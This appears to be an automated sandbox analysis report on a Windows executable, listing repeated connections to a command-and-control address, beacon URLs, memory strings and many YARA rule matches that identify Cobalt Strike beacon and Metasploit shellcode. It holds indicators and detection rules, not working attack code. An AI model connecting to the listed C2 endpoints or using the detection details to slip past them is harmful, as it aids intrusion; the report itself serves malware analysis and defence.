            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01AE68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,0_2_00000265B01AE68C
            Source: global trafficDNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
            Source: JP1KbvjWcM.exe, 00000000.00000003.1681676217.00000265AFFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/a4
            Source: JP1KbvjWcM.exe, 00000000.00000003.1681676217.00000265AFFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/k4
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabT
            Source: JP1KbvjWcM.exe, 00000000.00000003.1681676217.00000265AFFAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/q5
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184/
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184/8
            Source: JP1KbvjWcM.exe, 00000000.00000003.2779450745.00000265AFF87000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF87000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/Ld3z
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/Ld3zc
            Source: JP1KbvjWcM.exe, 00000000.00000003.2779450745.00000265AFF87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/l
            Source: JP1KbvjWcM.exe, 00000000.00000003.1967514509.00000265AFF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/match
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/match%
            Source: JP1KbvjWcM.exe, 00000000.00000003.1967322736.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/match06
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/match32
            Source: JP1KbvjWcM.exe, 00000000.00000003.1839792896.00000265AFF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/match7
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/match9
            Source: JP1KbvjWcM.exe, 00000000.00000003.2779558871.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/matchC
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/matchP
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/matchT
            Source: JP1KbvjWcM.exe, 00000000.00000002.2911305733.00000265AFF87000.00000004.00000020.00020000.00000000.sdmp, JP1KbvjWcM.exe, 00000000.00000003.1967514509.00000265AFF85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/matche
            Source: JP1KbvjWcM.exe, 00000000.00000003.1967322736.00000265AFFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.19.190.184:4436/matchm

            System Summary

            barindex
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
            Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: unknown
            Source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
            Source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
            Source: Process Memory Space: JP1KbvjWcM.exe PID: 7324, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B0F34 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError,0_2_00000265B01B0F34
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C1E640_2_00000265B01C1E64
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B867C0_2_00000265B01B867C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01CB6B00_2_00000265B01CB6B0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B0F340_2_00000265B01B0F34
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C0F740_2_00000265B01C0F74
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C2F9C0_2_00000265B01C2F9C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01CCF970_2_00000265B01CCF97
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C01A80_2_00000265B01C01A8
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01CF2000_2_00000265B01CF200
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01ADA3C0_2_00000265B01ADA3C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01AA2800_2_00000265B01AA280
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01CD2800_2_00000265B01CD280
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B7B380_2_00000265B01B7B38
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01CC3B00_2_00000265B01CC3B0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01CDBF00_2_00000265B01CDBF0
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C65140_2_00000265B01C6514
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01C25280_2_00000265B01C2528
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01A9D6C0_2_00000265B01A9D6C
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00007FF65B3B51200_2_00007FF65B3B5120
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00007FF65B3B3F400_2_00007FF65B3B3F40
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B208196F0_2_00000265B208196F
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B207F5EF0_2_00000265B207F5EF
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B20823E30_2_00000265B20823E3
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B20812AB0_2_00000265B20812AB
            Source: JP1KbvjWcM.exeStatic PE information: Number of sections : 11 > 10
            Source: JP1KbvjWcM.exe, 00000000.00000000.1648185487.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHipsMain.exeT vs JP1KbvjWcM.exe
            Source: JP1KbvjWcM.exeBinary or memory string: OriginalFilenameHipsMain.exeT vs JP1KbvjWcM.exe
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
            Source: 0.2.JP1KbvjWcM.exe.265b01a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
            Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
            Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
            Source: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
